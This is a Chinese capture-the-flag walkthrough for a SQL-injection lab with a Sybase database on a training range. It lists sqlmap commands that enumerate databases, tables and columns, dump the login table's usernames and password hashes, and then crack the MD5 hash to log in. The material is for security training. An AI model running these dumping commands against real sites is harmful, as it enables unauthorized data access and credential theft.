墨者_SQL手工注入漏洞测试(Sybase数据库)

靶场:

https://www.mozhe.cn/bug/detail/b0R2Q0VJL3lnellUMjJoUmRsK1FsZz09bW96aGUmozhe

背景介绍

安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境Apache+PHP+Sybase,PHP代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。

实训目标

1.掌握SQL注入原理;
2.了解手工注入的方法;
3.了解Sybase的数据结构;
4.了解字符串的MD5加解密;

解题方向

手工进行SQL注入测试,获取管理密码登录。

解题思路:

1、打开靶场访问首页

墨者_SQL手工注入漏洞测试(Sybase数据库)

2、找注入点

墨者_SQL手工注入漏洞测试(Sybase数据库)

3、使用sqlmap

爆数据库:

sqlmap -u "http://219.153.49.228:47565/new_list.php?id=1" --dbs --batch

墨者_SQL手工注入漏洞测试(Sybase数据库)

爆mozhe_Deepthroat数据库的表名

sqlmap -u "http://219.153.49.228:47565/new_list.php?id=1" -D mozhe_Deepthroat --tables --batch

墨者_SQL手工注入漏洞测试(Sybase数据库)

爆Deepthroat表的列名

sqlmap -u "http://219.153.49.228:47565/new_list.php?id=1" -D mozhe_Deepthroat -T Deepthroat_login --columns --batch

墨者_SQL手工注入漏洞测试(Sybase数据库)

爆用户名和密码

sqlmap -u "http://219.153.49.228:47565/new_list.php?id=1" -D mozhe_Deepthroat -T Deepthroat_login -C name,password --dump --batch

墨者_SQL手工注入漏洞测试(Sybase数据库)

4、使用第一组账户密码进行登录,密码需MD5在线解密,获取key

墨者_SQL手工注入漏洞测试(Sybase数据库)